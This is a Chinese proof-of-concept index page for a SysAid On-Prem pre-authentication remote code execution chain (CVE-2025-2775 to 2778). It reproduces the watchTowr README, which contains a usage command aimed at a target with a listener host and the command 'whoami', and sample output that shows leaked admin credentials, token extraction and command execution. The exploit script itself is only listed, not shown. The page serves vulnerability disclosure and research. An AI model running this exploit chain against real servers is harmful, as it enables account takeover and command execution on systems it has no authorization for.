关联漏洞
标题:
SysAid On-Prem 安全漏洞
(CVE-2025-2775)
描述:SysAid On-Prem是以色列SysAid公司的一个本地化部署的IT服务管理(ITSM)平台。 SysAid On-Prem 23.3.40及之前版本存在安全漏洞,该漏洞源于Checkin处理功能中存在未经验证的XML外部实体漏洞,可能导致管理员账户接管和文件读取。
描述
PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)
介绍
# SysAid PreAuth RCE Chain PoC
PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778)
See our [blog post](https://labs.watchtowr.com/) for technical details
https://github.com/user-attachments/assets/03245fab-915d-43b6-8e91-f0a18251af49
# PoC in Action
```
python watchTowr-vs-SysAid-PreAuth-RCE-Chain.py -t http://192.168.201.217:8080/ -l 192.168.201.1 -c "whoami"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-SysAid-PreAuth-RCE-Chain.py
(*) SysAid Pre-Auth RCE Chain
- Sina Kheirkhah (@SinSinology) and Jake Knott of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778]
[+] Starting HTTP server on port 80
[*] Leaking creds...
[+] Leaked credentials: admin:Aa123456
[+] Successfully logged in
[+] Extracted token
[*] Poisoning with commands
[+] Commands executed successfully
[*] Done
```
# Affected Versions
The following versions are vulnerable to this pre-auth RCE chain: `<= 23.3.40`, vendor release note can be found [here](https://documentation.sysaid.com/docs/24-40-60)
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
文件快照
[4.0K] /data/pocs/ab16af50cb657c53e61f4ba2a5ba9424eac4687d
├── [1.7K] README.md
└── [4.8K] watchTowr-vs-SysAid-PreAuth-RCE-Chain.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。